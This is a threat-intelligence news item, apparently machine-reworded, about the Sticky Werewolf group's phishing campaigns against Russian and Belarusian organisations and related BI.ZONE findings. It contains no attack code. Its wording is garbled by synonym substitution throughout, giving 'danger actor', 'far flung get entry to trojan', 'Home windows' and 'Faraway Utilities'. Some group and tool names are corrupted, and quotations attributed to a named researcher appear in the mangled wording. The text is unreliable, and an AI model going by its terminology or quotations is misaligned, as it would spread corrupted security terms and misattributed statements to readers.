Cybersecurity researchers have disclosed main points of a danger actor referred to as Sticky Werewolf that has been connected to cyber assaults concentrated on entities in Russia and Belarus.
The phishing assaults had been geared toward a pharmaceutical corporate, a Russian analysis institute coping with microbiology and vaccine construction, and the aviation sector, increasing past their preliminary center of attention of presidency organizations, Morphisec stated in a document closing week.
“In earlier campaigns, the an infection chain started with phishing emails containing a hyperlink to obtain a malicious record from platforms like gofile.io,” safety researcher Arnold Osipov stated. “This newest marketing campaign used archive recordsdata containing LNK recordsdata pointing to a payload saved on WebDAV servers.”
Sticky Werewolf, some of the many danger actors concentrated on Russia and Belarus reminiscent of Cloud Werewolf (aka Inception and Cloud Atlas), Quartz Wolf, Pink Wolf (aka RedCurl), and Scaly Wolf, was once first documented by means of BI.ZONE in October 2023. The gang is assumed to be energetic since no less than April 2023.
Earlier assaults documented by means of the cybersecurity company leveraged phishing emails with hyperlinks to malicious payloads that culminated within the deployment of the NetWire far flung get entry to trojan (RAT), which had its infrastructure taken down early closing yr following a legislation enforcement operation.
The brand new assault chain seen by means of Morphisec comes to the usage of a RAR archive attachment that, when extracted, accommodates two LNK recordsdata and a decoy PDF record, with the latter claiming to be a call for participation to a video convention and urging the recipients to click on at the LNK recordsdata to get the assembly schedule and the e-mail distribution checklist.
Opening both of the LNK recordsdata triggers the execution of a binary hosted on a WebDAV server, which ends up in the release of an obfuscated Home windows batch script. The script, in flip, is designed to run an AutoIt script that in the long run injects the general payload, on the identical time bypassing safety instrument and research makes an attempt.
“This executable is an NSIS self-extracting archive which is a part of a prior to now recognized crypter named CypherIT,” Osipov stated. “Whilst the unique CypherIT crypter is not being offered, the present executable is a variant of it, as seen in a few hacking boards.”
The top purpose of the marketing campaign is to ship commodity RATs and knowledge stealer malware reminiscent of Rhadamanthys and Ozone RAT.
“Whilst there is not any definitive proof pointing to a selected nationwide starting place for the Sticky Werewolf crew, the geopolitical context suggests imaginable hyperlinks to a pro-Ukrainian cyberespionage crew or hacktivists, however this attribution stays unsure,” Osipov stated.
The improvement comes as BI.ZONE printed an task cluster codenamed Sapphire Werewolf that has been attributed as in the back of greater than 300 assaults on Russian training, production, IT, protection, and aerospace engineering sectors the usage of Amethyst, an offshoot of the preferred open‑supply SapphireStealer.
The Russian corporate, in March 2024, additionally exposed clusters known as Fluffy Wolf and Mysterious Werewolf that experience used spear-phishing lures to distribute Faraway Utilities, XMRig miner, WarZone RAT, and a bespoke backdoor dubbed RingSpy.
“The RingSpy backdoor permits an adversary to remotely execute instructions, download their effects, and obtain recordsdata from community sources,” it famous. “The backdoor’s [command-and-control] server is a Telegram bot.”